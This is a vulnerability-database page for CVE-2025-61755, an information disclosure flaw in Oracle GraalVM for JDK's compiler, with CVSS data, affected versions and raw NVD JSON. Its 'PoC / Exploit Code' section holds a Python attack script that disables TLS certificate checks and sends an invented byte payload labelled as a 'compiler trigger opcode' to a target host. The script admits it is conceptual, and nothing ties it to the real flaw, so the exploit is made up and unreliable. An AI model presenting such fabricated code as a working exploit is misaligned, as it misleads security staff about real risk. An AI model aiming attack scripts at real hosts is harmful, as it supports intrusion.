Security Vulnerability Report
中文
CVE-2025-61755 CVSS 3.7 LOW

CVE-2025-61755

Published: 2025-10-21 20:20:52
Last Modified: 2025-10-27 20:36:48
Source: [email protected]

Description

Vulnerability in the Oracle GraalVM for JDK product of Oracle Java SE (component: Compiler). Supported versions that are affected are Oracle GraalVM for JDK: 17.0.16 and 21.0.8. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM for JDK accessible data. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:graalvm_for_jdk:17.0.16:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.8:*:*:*:*:*:*:* - VULNERABLE
Oracle GraalVM for JDK 17.0.16
Oracle GraalVM for JDK 21.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61755 - Oracle GraalVM for JDK Compiler Information Disclosure # Note: This is a conceptual PoC based on the vulnerability description. # The actual exploitation requires specific conditions due to high attack complexity (AC:H). import socket import ssl import struct class GraalVMExploit: """ Conceptual PoC for CVE-2025-61755 Oracle GraalVM for JDK Compiler Component Information Disclosure """ def __init__(self, target_host, target_port=443): self.target_host = target_host self.target_port = target_port self.vulnerable_versions = ["17.0.16", "21.0.8"] def check_version(self, banner): """Check if target is running a vulnerable GraalVM version""" for version in self.vulnerable_versions: if version in banner: return True return False def craft_malicious_request(self): """ Craft a specially crafted request targeting the compiler component. The request aims to trigger the information disclosure path in the GraalVM JIT/AOT compiler. """ # Construct payload targeting GraalVM compiler internals # This is a simplified representation of the attack vector payload = b"\x00\x01" payload += struct.pack(">I", 0xDEADBEEF) # Compiler trigger opcode payload += b"\x00" * 256 # Padding with specific patterns return payload def exploit(self): """ Attempt to exploit CVE-2025-61755 Note: Requires specific network conditions and protocol support """ try: # Establish connection (supports multiple protocols) context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE with socket.create_connection((self.target_host, self.target_port)) as sock: with context.wrap_socket(sock, server_hostname=self.target_host) as ssock: # Send crafted request to trigger compiler vulnerability payload = self.craft_malicious_request() ssock.send(payload) # Receive leaked data response = ssock.recv(4096) if response: print(f"[+] Potential data leak detected: {len(response)} bytes") return response else: print("[-] No data leaked") return None except Exception as e: print(f"[-] Exploitation failed: {e}") return None if __name__ == "__main__": # Usage example exploit = GraalVMExploit("target-graalvm-host.example.com") leaked_data = exploit.exploit() if leaked_data: print(f"[+] Leaked data: {leaked_data.hex()}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61755", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:51.983", "lastModified": "2025-10-27T20:36:48.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle GraalVM for JDK product of Oracle Java SE (component: Compiler). Supported versions that are affected are Oracle GraalVM for JDK: 17.0.16 and 21.0.8. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM for JDK accessible data. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:graalvm_for_jdk:17.0.16:*:*:*:*:*:*:*", "matchCriteriaId": "56BDCE92-E161-46DC-8A2E-17EF7303DBFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:graalvm_for_jdk:21.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "29154F4D-88E2-43FA-9DDA-1DEF5F588A31"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.